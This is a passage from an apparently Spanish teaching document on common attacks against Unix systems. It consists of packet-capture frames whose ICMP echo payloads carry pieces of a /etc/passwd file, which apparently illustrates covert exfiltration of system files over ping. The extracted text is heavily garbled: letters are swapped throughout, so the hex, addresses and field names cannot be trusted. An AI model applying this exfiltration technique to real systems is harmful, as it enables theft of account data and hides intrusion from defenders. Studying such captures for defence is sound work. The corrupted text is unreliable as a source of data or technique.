Brame 6 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D+e+5 -!orre!t0 87entifier: 0D1)1( .equen!e number: 51( 90D0(00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7((#3#313#313#3#303#303#... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 30 73 3a (f 7( 7+ 6e 0! 9+ 1e 63 3a 79 (f 6e 3a 65 (f (9 7+ 00 6b +f 73 7( 6f (a 67 e1 3a 00 6+ 77 7+ 6f 6! 3a (0 a( 00 +e 6f 6e 65 6f 6f 3( (6 (6 00 +5 6f 65 67 7+ 67 3a 3a 00 +0 1) 7( 7( (0 3a 69 35 (f 17 01 1( (a (0 70 (f 6e 3a 3a 31 )+ 0( 3a 6f 7( 75 0a 3a (f 96 be 00 31 66 6f 73 6f 30 75 5b !0 63 3a (0 63 7( 70 3a 73 1f a) 6! 31 67 65 (f 65 30 7( 0) 00 61 3a 61 73 73 7( 3a (f 00 0( 76 3a 6e 73 6( 61 53 73 +5 !0 65 30 79 65 69 7+ 79 6( 00 a) 6( 3a (0 73 6e 6f 73 69 ..:..e..1.-...<. ..t:..I......... ....N<....!"a@eb a!67oorQ:1:1::0: 0:O>ner of manE E tem pro!e e :;root:;u r; bin ;no"ogin.operato r:Q:(:5::0:0:.E tem e:;:;u r; bi n;
Brame 7 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0Dfb!) -!orre!t0 87entifier: 0D1)1( .equen!e number: 76) 90D0300: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(6<6B6,6B67696<0#6(696<... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 69 6e 61 7( 7+ 30 (f 17 9+ 0( 63 6e 61 6e (f 79 3a 75 31 0f 0) 6b 3a 7( 6+ 73 3a 5+ 96 (7 00 6+ (a 69 (0 6( (a 7+ 5b 00 fb 6f 3a 65 53 69 3a 79 1f 00 !) 6f 33 73 6f 6e 3+ (0 00 +0 1) 7( 3a (0 75 (f 3a 53 0! 01 1( 6e 37 +3 7( 6e 36 61 (9 e9 03 6f 3a 6f 63 6f 35 6e e1 71 00 6! 3a 67 65 6! 35 6+ a( !0 63 6f 30 67 3a 6f 33 6( (6 a) 6! 67 3a 61 (f 67 33 6f 0) 00 61 69 30 6e 3a 69 3a 7) 00 1e 76 6e 3a 6+ (f 6e 3a 3a +5 !0 65 0a +( 73 75 0a 30 (f 00 a) 6( 6( 69 (0 73 7+ 3a 3a ..1.-...:..e..<. ...J..I......... ..........!"a@eb a!67oorno"ogin.b in:Q:3:7::0:0:Ci narie ,omman7 an7 .our!e:;:;u r; bin;no"ogin.t tE:Q:+:65533::0: 0:TtE .an7boD:;: ;u
Brame ) 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D03!9 -!orre!t0 87entifier: 0D1)1( .equen!e number: 76) 90D0300: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(6<6B6,6B67696<0#6(696<... 0000 0010 00 0! (9 e1 a( (6 00 17 31 96 5b 1f 0) 00 +5 00 00 9+ 7+ 3b 00 00 +0 01 )+ b7 !0 a) 00 0( !0 a) ..:..e..1.-...<. ..tL..I.........
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *0- de 22O
Brame 9 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0Db6e) -!orre!t0 87entifier: 0D1)1( .equen!e number: 10(+ 90D0+00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(737((B736(696<(B6<6B6,... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 6f 36 53 6( 73 67 (f 17 9+ 0( 63 6! 35 61 69 3a 65 75 31 09 0) 6b 6f 35 6e 6e (a 73 96 1f 00 6+ 67 33 6+ (f 3a (0 5b 00 b6 6f 69 33 6( 6e 37 70 1f 00 e) 6f 6e 3a 6f 6f 3a 73 00 +0 1) 7( 0a 3a 7) 6! 31 65 0! 01 1( 73 6b 30 3a 6f 33 75 (9 ef 0+ 7( 67 3a (f 67 3a 6+ e1 79 00 (f 65 30 3a 69 3a 6f a( !0 63 73 67 3a (f 6e 30 (7 (6 a) 6! 6( 3a +b 75 0a 3a 75 0) 00 61 69 (a +7 73 67 30 73 00 1e 76 6e 3a 65 7( 61 3a 65 +5 !0 65 (f 35 67 (f 67 +7 7( 00 a) 6( 6e 3a (0 73 65 61 3a ..1.-...:..e..<. ......I......... ..........!"a@eb a!67oor r; bin;n o"ogin.6mem:Q:5: 65533::0:0:53em .an7boD:;:;u r; bin;no"ogin.game :Q:7:13::0:0:Ha me p eu7o-u er: ;u
Brame 10 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0Dbee) -!orre!t0 87entifier: 0D1)1( .equen!e number: 10(+ 90D0+00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(737((B736(696<(B6<6B6,... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 6f 36 53 6( 73 67 (f 0! 9+ 1e 63 6! 35 61 69 3a 65 75 (9 7+ 00 6b 6f 35 6e 6e (a 73 e1 3! 00 6+ 67 33 6+ (f 3a (0 a( 00 be 6f 69 33 6( 6e 37 70 (6 00 e) 6f 6e 3a 6f 6f 3a 73 00 +0 1) 7( 0a 3a 7) 6! 31 65 17 01 1( 73 6b 30 3a 6f 33 75 31 )+ 0+ 7( 67 3a (f 67 3a 6+ 96 b! 00 (f 65 30 3a 69 3a 6f 5b !0 63 73 67 3a (f 6e 30 (7 1f a) 6! 6( 3a +b 75 0a 3a 75 0) 00 61 69 (a +7 73 67 30 73 00 0( 76 6e 3a 65 7( 61 3a 65 +5 !0 65 (f 35 67 (f 67 +7 7( 00 a) 6( 6e 3a (0 73 65 61 3a ..:..e..1.-...<. ..tT..I......... ..........!"a@eb a!67oor r; bin;n o"ogin.6mem:Q:5: 65533::0:0:53em .an7boD:;:;u r; bin;no"ogin.game :Q:7:13::0:0:Ha me p eu7o-u er: ;u
Brame 11 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0D)e0e -!orre!t0 87entifier: 0D1)1( .equen!e number: 1()0 90D0500:
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *01 de 22O
Brame 1( 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D960e -!orre!t0 87entifier: 0D1)1( .equen!e number: 1()0 90D0500: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(737((B67616D65733#(B75... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 (f 6e 30 3a 6f 30 61 0! 9+ 1e 63 75 0a 3a (f 67 3a 67 (9 7+ 00 6b 73 6e +e 3a 69 30 e1 37 00 6+ 7( 65 65 (f 6e 3a a( 00 96 6f (f 77 77 75 0a +7 (6 00 0e 6f 73 73 73 73 67 69 00 +0 1) 7( 6( 3a (0 7( 61 73 17 01 1( 73 69 (a 53 (f 6e 7+ 31 )+ 05 7( 6e 3a 75 73 3a 65 96 bb 00 (f (f 3) 6( 6( (a 7( 5b !0 63 67 6e 3a 73 69 3a (0 1f a) 6! 61 6f 3) 79 6e 39 +7 0) 00 61 67 6! 3a 73 (f 3a 61 00 0( 76 65 6f 3a 7+ 6e 39 6e +5 !0 65 73 67 30 65 6f 3a (0 00 a) 6( 3a 69 3a 67 6! 3a 50 ..:..e..1.-...<. ..t1..I......... ..........!"a@eb a!67oor r;game : ;u r; bin;no"ogi n.ne> :Q:):)::0: 0:Ne> .ub E tem :;:;u r; bin;no" ogin.man:Q:9:9:: 0:0:3i ter 3an P ag
Brame 13 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0D5bb( -!orre!t0 87entifier: 0D1)1( .equen!e number: 1536 90D0600: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(65733#(B75737((B736)61... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 6) 69 (a 75 3a (f 67 17 9+ 0( 63 61 6e 3a 7( (f 73 73 31 01 0) 6b 7( (f 3( 65 76 6( 96 !a 00 6+ 65 6e 3( (0 61 69 5b 00 5b 6f (f 6f 3a 53 7( 6e 1f 00 b( 6f 67 6! 3( 6) (f (f 00 +0 1) 7( 61 6f 3( 65 65 6e 0! 01 1( 65 6e 67 3a 6! 67 6f (9 f7 06 73 3a 69 3a 6! 70 6! e1 (e 00 3a (f 6e 30 (0 7+ 6f a( !0 63 (f 75 0a 3a ++ 79 67 (6 a) 6! 75 73 73 30 61 3a 69 0) 00 61 73 7( 73 3a 65 (f 6e 00 1e 76 7( (f 6) 53 67 75 0a +5 !0 65 (f 73 6+ 65 6f 73 73 00 a) 6( 73 6( 3a 63 6e 7( 67 ..1.-...:..e..<. ......I......... ....-.....!"a@eb a!67oore :;u r; 'are;man:;u r; b in;no"ogin. '7: Q:((:((::0:0:.e! ure .'e"" Daemon :;@ar;emptE:;u r ; bin;no"ogin. m m
Brame 1+ 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o"
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *05 de 22O
Brame 15 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0D7156 -!orre!t0 87entifier: 0D1)1( .equen!e number: 179( 90D0700: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(703#(#3#3(353#3(353#3#... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 3a 75 76 67 (f 6! 65 17 9+ 0( 63 3a 6( 61 71 6e 3a 6e 31 )9 0) 6b 30 67 7( 75 6f (a 96 (0 00 6+ 3a 69 (f 65 6! 3a 5b 00 71 6f 30 73 73 75 6f 3( 1f 00 56 6f 3a 73 70 65 67 36 00 +0 1) 7( 53 69 6f 3a 69 3a 0! 01 1( 70 65 6f 6f (f 6e 3( (9 6f 07 3a 6e 6e 6! 75 0a 36 e1 7) 00 (a 6+ (0 (f 73 67 3a a( !0 63 3a 67 55 63 7( 61 3a (6 a) 6! 3( 61 73 6! (f 69 30 0) 00 61 35 69 65 69 73 6! 3a 00 1e 76 3a 6! 7( 65 6( 6e 30 +5 !0 65 3( (0 3a 6e 69 75 3a 00 a) 6( 35 53 (f 7+ 6e 6! 53 ..1.-...:..e..<. ... ..I.o....... .....=....!"a@eb a!67oorp:Q:(5:(5 ::0:0:.en7mai" . ubmi ion K er:; @ar; poo";!"ient mqueue:;u r; bin ;no"ogin.mai"nu" ":Q:(6:(6::0:0:. en
Brame 16 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D7956 -!orre!t0 87entifier: 0D1)1( .equen!e number: 179( 90D0700: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(703#(#3#3(353#3(353#3#... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 3a 75 76 67 (f 6! 65 0! 9+ 1e 63 3a 6( 61 71 6e 3a 6e (9 7+ 00 6b 30 67 7( 75 6f (a e1 3f 00 6+ 3a 69 (f 65 6! 3a a( 00 79 6f 30 73 73 75 6f 3( (6 00 56 6f 3a 73 70 65 67 36 00 +0 1) 7( 53 69 6f 3a 69 3a 17 01 1( 70 65 6f 6f (f 6e 3( 31 )+ 07 3a 6e 6e 6! 75 0a 36 96 b9 00 (a 6+ (0 (f 73 67 3a 5b !0 63 3a 67 55 63 7( 61 3a 1f a) 6! 3( 61 73 6! (f 69 30 0) 00 61 35 69 65 69 73 6! 3a 00 0( 76 3a 6! 7( 65 6( 6e 30 +5 !0 65 3( (0 3a 6e 69 75 3a 00 a) 6( 35 53 (f 7+ 6e 6! 53 ..:..e..1.-...<. ..t*..I......... .....=....!"a@eb a!67oorp:Q:(5:(5 ::0:0:.en7mai" . ubmi ion K er:; @ar; poo";!"ient mqueue:;u r; bin ;no"ogin.mai"nu" ":Q:(6:(6::0:0:. en
!apture7:
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *0J de 22O
Brame 1) 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D67ff -!orre!t0 87entifier: 0D1)1( .equen!e number: (0+) 90D0)00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(6+6D61696,(0++65666175... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 61 70 (f 6e +( 75 0a 0! 9+ 1e 63 75 6f 73 6+ 69 73 70 (9 7+ 00 6b 6! 6f 6( 3a 6e 7( e1 +0 00 6+ 7+ 6! 69 (a 6+ (f a( 00 67 6f (0 (f 6e 3a (0 73 (6 00 ff 6f 55 67 (f 35 53 6( 00 +0 1) 7( 73 71 6e 33 61 69 17 01 1( 6+ 65 75 6f 3a 6e 6e 31 )+ 0) 67 7( 65 6! 35 6+ (f 96 b) 00 61 3a 75 6f 33 6( 6e 5b !0 63 69 (f 65 67 3a 6f 6f 1f a) 6! 6! 76 3a 69 3a 7) 6! 0) 00 61 (0 61 (f 6e 30 3a 6f 00 0( 76 ++ 7( 75 0a 3a (f 67 +5 !0 65 65 (f 73 6( 30 3a 69 00 a) 6( 66 73 7( 69 3a (f 6e ..:..e..1.-...<. ..tI..I......... ....m.....!"a@eb a!67oor7mai" Def au"t K er:;@ar; poo";mqueue:;u r ; bin;no"ogin.bi n7:Q:53:53::0:0: Cin7 .an7boD:;:; u r; bin;no"ogin .p
Brame 19 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0D9(5b -!orre!t0 87entifier: 0D1)1( .equen!e number: (30+ 90D0900: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(7(6B7)793#(#3#363(3#36... 0000 0010 00(0 0030 00+0 0050 0060 0070 00 00 00 61 3a +6 65 (f 17 9+ 0( 63 36 69 7( 75 31 a7 0) 6b 3( 6! 3a 73 96 e7 00 6+ 3a 7+ (f 7( 5b 00 9( 6f 3a 65 6e (f 1f 00 5b 6f 30 7( 6f 73 00 +0 1) 7( 3a (0 6e 6( 0! 01 1( 7( 30 70 65 69 (9 +b 09 6f 3a 73 7) 6e e1 0b 00 7) 50 65 69 (f a( !0 63 79 61 75 73 6e (6 a) 6! 3a 63 6+ 7+ 6f 0) 00 61 (a 6b 6f 65 6! 00 1e 76 3a 65 (7 6e 6f +5 !0 65 36 7+ 75 7+ 67 00 a) 6( 3( (0 73 3a 69 ..1.-...:..e..<. ......I.5....... .....-....!"a@eb a!67oorroDE:Q:6( :6(::0:0:Pa!6et Bi"ter p eu7o-u er:;noneDi tent: ;u r; bin;no"ogi
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *0+ de 22O
Brame (0 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D9a5b -!orre!t0 87entifier: 0D1)1( .equen!e number: (30+ 90D0900: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(7(6B7)793#(#3#363(3#36... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 3a +6 65 (f 6e 3+ 69 0! 9+ 1e 63 36 69 7( 75 0a 3a 76 (9 7+ 00 6b 3( 6! 3a 73 5f 3a e1 +1 00 6+ 3a 7+ (f 7( 70 30 a( 00 9a 6f 3a 65 6e (f 66 3a (6 00 5b 6f 30 7( 6f 73 6! 30 00 +0 1) 7( 3a (0 6e 6( 6f 3a 17 01 1( 7( 30 70 65 69 67 70 31 )+ 09 6f 3a 73 7) 6e 6+ 66 96 b7 00 7) 50 65 69 (f 3a 6! 5b !0 63 79 61 75 73 6e (a 6f 1f a) 6! 3a 63 6+ 7+ 6f 3a 67 0) 00 61 (a 6b 6f 65 6! 36 6+ 00 0( 76 3a 65 (7 6e 6f 3+ (0 +5 !0 65 36 7+ 75 7+ 67 3a 70 00 a) 6( 3( (0 73 3a 69 36 7( ..:..e..1.-...<. ..t#..I......... .....-....!"a@eb a!67oorroDE:Q:6( :6(::0:0:Pa!6et Bi"ter p eu7o-u er:;noneDi tent: ;u r; bin;no"ogi n.Apf"og7:Q:6+:6 +::0:0:pf"og7 pr i@
Brame (1 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0D6()! -!orre!t0 87entifier: 0D1)1( .equen!e number: (560 90D0a00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(736570(07573657(3#(B76... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 (f 73 63 6+ 61 69 (a 17 9+ 0( 63 76 6( 70 6) 7( 6e 3a 31 bb 0) 6b 61 69 3a 63 (f (f 96 !7 00 6+ 7( 6e (a 70 65 6e 5b 00 6( 6f (f (f 3a (0 67 6f 1f 00 )! 6f 65 6e 36 70 70 6! 00 +0 1) 7( 67 6f 35 7( 7+ 6f 0! 01 1( 73 70 6! 3a 6f 79 67 (9 37 0a 65 7+ 6f 36 67 3a 69 e1 31 00 70 79 67 35 7( (f 6e a( !0 63 (0 3a 69 3a 61 75 0a (6 a) 6! 75 (f 6e 3a 67 73 75 0) 00 61 73 75 0a 30 73 7( 75 00 1e 76 65 73 5f 3a 3a (f 63 +5 !0 65 7( 7( 6+ 30 (f 73 70 00 a) 6( 3a (f 6) 3a 76 6( 3a ..1.-...:..e..<. ......I.11...... ....b.....!"a@eb a!67oor ep u er: ;@ar;emptE:;u r; bin;no"ogin.A7' !p:Q:65:65::0:0: 7'!p program :;@ ar;emptE:;u r; b in;no"ogin.uu!p: Q:
Brame (( 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D6a)! -!orre!t0 87entifier: 0D1)1( .equen!e number: (560 90D0a00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(736570(07573657(3#(B76... 0000 0010 00(0 00 0! (9 e1 a( (6 00 17 31 96 5b 1f 0) 00 +5 00 00 9+ 7+ +( 00 00 +0 01 )+ b6 !0 a) 00 0( !0 a) 00 1e 00 00 6a )! 1) 1( 0a 00 63 6! 61 76 65 6( ..:..e..1.-...<. ..tC..I......... ....Y.....!"a@eb
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *0O de 22O
Brame (3 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0D59!e -!orre!t0 87entifier: 0D1)1( .equen!e number: ()16 90D0b00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(36363#36363#3#303#303#... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 30 65 63 63 (f 3a 69 17 9+ 0( 63 3a 7( 70 61 75 36 63 31 (9 0) 6b 55 3a 70 6! 75 3a 96 07 00 6+ 55 (f 75 (f 63 3a 5b 00 59 6f +3 76 6( 6! 69 30 1f 00 !e 6f 50 61 6! 69 63 3a 00 +0 1) 7( (0 7( 69 6( 6f 30 0! 01 1( 36 70 (f 63 65 0a 3a (9 !f 0b 36 73 73 3a 7) 70 50 e1 f1 00 3a 65 70 (f 65 6f 6f a( !0 63 36 75 6f 75 63 70 73 (6 a) 6! 36 6+ 6f 73 (f 3a 7+ 0) 00 61 3a 6f 6! 7( 75 (a (0 00 1e 76 3a (7 (f (f 75 3a +f +5 !0 65 30 75 75 6! 63 36 66 00 a) 6( 3a 73 75 6f 70 3) 66 ..1.-...:..e..<. ..:...I......... ..../.....!"a@eb a!67oor66:66::0: 0:KK,P p eu7o-u er:;@ar; poo";uu !ppub"i!:;u r;"o !a";"ibeDe!;uu!p ;uu!i!o.pop:Q:6) :6::0:0:Po t Off i!
Brame (+ 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D61!e -!orre!t0 87entifier: 0D1)1( .equen!e number: ()16 90D0b00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(36363#36363#3#303#303#... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 30 65 63 63 (f 3a 69 0! 9+ 1e 63 3a 7( 70 61 75 36 63 (9 7+ 00 6b 55 3a 70 6! 75 3a e1 +3 00 6+ 55 (f 75 (f 63 3a a( 00 61 6f +3 76 6( 6! 69 30 (6 00 !e 6f 50 61 6! 69 63 3a 00 +0 1) 7( (0 7( 69 6( 6f 30 17 01 1( 36 70 (f 63 65 0a 3a 31 )+ 0b 36 73 73 3a 7) 70 50 96 b5 00 3a 65 70 (f 65 6f 6f 5b !0 63 36 75 6f 75 63 70 73 1f a) 6! 36 6+ 6f 73 (f 3a 7+ 0) 00 61 3a 6f 6! 7( 75 (a (0 00 0( 76 3a (7 (f (f 75 3a +f +5 !0 65 30 75 75 6! 63 36 66 00 a) 6( 3a 73 75 6f 70 3) 66 ..:..e..1.-...<. ..t,..I......... ....a.....!"a@eb a!67oor66:66::0: 0:KK,P p eu7o-u er:;@ar; poo";uu !ppub"i!:;u r;"o !a";"ibeDe!;uu!p ;uu!i!o.pop:Q:6) :6::0:0:Po t Off i!
Brame (5 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0De)7e -!orre!t0 87entifier: 0D1)1( .equen!e number: 307( 90D0!00: Data 91(0 bEte :
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *00 de 22O
Brame (6 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0Df07e -!orre!t0 87entifier: 0D1)1( .equen!e number: 307( 90D0!00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(65(0+B776<657(3#(B6<6B... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 6e (f 77 6f 6e 3a 69 0! 9+ 1e 63 6f 73 3a 7( 65 (f 6e (9 7+ 00 6b 6e 6( (a 6! 7( 75 e1 ++ 00 6+ 65 69 3a 6+ 3a 73 a( 00 f0 6f 7) 6e 3) (0 (f 7( (6 00 7e 6f 69 (f 30 57 6e (f 00 +0 1) 7( 73 6e 3a 69 6f 73 17 01 1( 65 7+ 6f 3) 6+ 6e 6( 31 